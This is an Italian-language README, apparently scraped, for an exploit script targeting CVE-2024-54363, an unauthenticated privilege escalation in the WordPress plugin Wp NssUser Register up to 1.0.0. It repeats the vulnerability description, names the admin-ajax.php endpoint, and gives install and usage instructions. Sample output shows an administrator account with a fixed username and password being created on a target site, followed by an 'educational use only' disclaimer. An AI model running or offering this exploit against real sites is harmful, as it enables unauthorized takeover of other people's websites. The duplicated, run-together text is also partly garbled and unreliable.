
Vulnerabilità di assegnazione dei privilegi errata in nssTheme Wp NssUser Register consente l'escalation dei privilegi. Questo problema riguarda Wp NssUser Register: dalla versione n/a fino alla 1.0.0.
Vulnerabilità di assegnazione errata dei privilegi in nssTheme Wp NssUser Register permette l'escalation dei privilegi. Questo problema riguarda Wp NssUser Register: da n/a fino a 1.0.0.
Il plugin nssTheme Wp NssUser Register per WordPress è vulnerabile a un problema di Assegnazione errata dei privilegi, che porta a un'Escalation dei privilegi. Questa vulnerabilità permette a un attaccante di registrare un nuovo utente con privilegi amministrativi senza la dovuta autorizzazione. Il problema riguarda le versioni del plugin fino alla 1.0.0.
Wp NssUser Register1.0.0/wp-admin/admin-ajax.php con la registrazione abilitata.pip install -r requirements.txt
usage: CVE-2024-54363.py [-h] -u URL
Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
The site http://target-wordpress-site.com is vulnerable. Exploitation in progress...
Exploitation successful!
Username: nxploit123
Password: nxploit
Questo script è fornito solo a scopo educativo. L'autore non è responsabile per eventuali danni causati dall'uso improprio di questo script.